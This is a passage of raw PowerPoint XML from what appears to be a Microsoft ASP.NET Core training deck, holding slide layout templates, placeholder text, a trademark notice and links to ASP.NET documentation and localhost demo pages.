                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="1900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/about/legal/permissions/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="112713" marR="0" lvl="0" indent="6350" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DirectX, Hyper-V, Internet Explorer, Microsoft, Outlook, SkyDrive, SQL Server, Windows, Windows Azure, Windows PowerShell, Windows Server, Windows Vista, and Zune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1064819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cs-CZ"/>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Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA64BE6A-6E41-4031-BB9E-0BE54FC73092}" type="datetimeFigureOut">
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>01.05.2020</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627B62F2-E81C-45ED-BFC1-34F5A7AC998F}" type="slidenum">
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2715501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General content_light_SubTitle">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301752" y="367204"/>
            <a:ext cx="11274552" cy="558219"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402336" y="1491346"/>
            <a:ext cx="11173968" cy="4607705"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="143992"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="90000"/>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="1600"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4673600" y="635508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14" name="Date Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="14"/>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70C8813-6FE8-4866-96EA-2F34AD4D1DE5}"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5/1/2020</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6" name="Slide Number Placeholder 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8851392" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203"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fld id="{AFFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="936002"/>
            <a:ext cx="11266488" cy="488951"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="179992">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2700">
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="828789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36">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3200" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="0A5BBA"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notes Continued</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4673600" y="6355080"/>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29" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203"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fld id="{AFFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
              <a:effectLst/>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8881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70" tIns="137154" rIns="91436" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2800" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Module #: Module Title</a:t>
            </a:r>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36" tIns="91436">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500" baseline="0">
                <a:latin typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1500" baseline="0">
                <a:latin typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1500" baseline="0">
                <a:latin typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1500" baseline="0">
                <a:latin typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Module Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3721695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70" tIns="137154" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Module #: Module Title</a:t>
            </a:r>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70" tIns="137154">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70" tIns="137154">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Lesson: Lesson Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338742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36">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a:t>Add single point here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4673600" y="6355080"/>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29" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203"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fld id="{AFFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
              <a:effectLst/>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9330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a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>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70" tIns="137154">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="57148" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="3600" baseline="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dirty="0"/>
              <a:t>Demonstration: Title of Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="280954382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9"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91436" tIns="45718" rIns="91436" bIns="4571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pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{29FBBBB9-6B33-4163-A4E5-E1F94A1F0FAC}" type="datetime1">
              <a:rPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/1/2020</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:tint val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>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chemeClr val="tx1">
                  <a:tint val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>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36" tIns="45718" rIns="91436" bIns="45718" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{AFFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="898989"/>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a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4181095"/>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 id="2147483886" r:id="rId14"/>
    <p:sldLayoutId id="2147483887" r:id="rId15"/>
    <p:sldLayoutId id="2147483888" r:id="rId16"/>
    <p:sldLayoutId id="2147483889" r:id="rId17"/>
    <p:sldLayoutId id="2147483890" r:id="rId18"/>
    <p:sldLayoutId id="2147483891" r:id="rId19"/>
    <p:sldLayoutId id="2147483892" r:id="rId20"/>
    <p:sldLayoutId id="2147483893" r:id="rId21"/>
    <p:sldLayoutId id="2147483894" r:id="rId22"/>
    <p:sldLayoutId id="2147483895" r:id="rId23"/>
    <p:sldLayoutId id="2147483896" r:id="rId24"/>
    <p:sldLayoutId id="2147483897" r:id="rId25"/>
    <p:sldLayoutId id="2147483898" r:id="rId26"/>
    <p:sldLayoutId id="2147483899" r:id="rId27"/>
    <p:sldLayoutId id="2147483900" r:id="rId28"/>
    <p:sldLayoutId id="2147483901" r:id="rId29"/>
    <p:sldLayoutId id="2147483902" r:id="rId30"/>
    <p:sldLayoutId id="2147483903" r:id="rId31"/>
    <p:sldLayoutId id="2147483904" r:id="rId32"/>
    <p:sldLayoutId id="2147483905" r:id="rId33"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914354"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589" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="300"/>
        </a:spcAft>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766" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="300"/>
        </a:spcAft>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2942" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="300"/>
        </a:spcAft>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120" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="300"/>
        </a:spcAft>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298" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="300"/>
        </a:spcAft>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29.png"/></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8.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3.xml"/><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8.png"/></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4.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41.png"/></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0.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62.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/aspnet/Mvc/tree/dev/src/Microsoft.AspNetCore.Mvc.TagHelpers" TargetMode="External"/><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45.tmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide62.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6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4.xml"/><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76.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.tmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide75.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.tmp"/></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80.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81.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82.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:26641/home/list" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.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hyperlink" Target="https://docs.asp.net/projects/api/en/latest/autoapi/Microsoft/AspNetCore/Mvc/Localization/IViewLocalizer/index.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide85.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.asp.net/projects/mvc/en/latest/views/index.html" TargetMode="Externa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90.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:5000/?culture=en-CA&amp;culture=fr-FR" TargetMode="External"/><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2.xml"/><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3.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9" name="Content Placeholder 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5486400"/>
            <a:ext cx="2667000" cy="301752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:alpha val="88000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
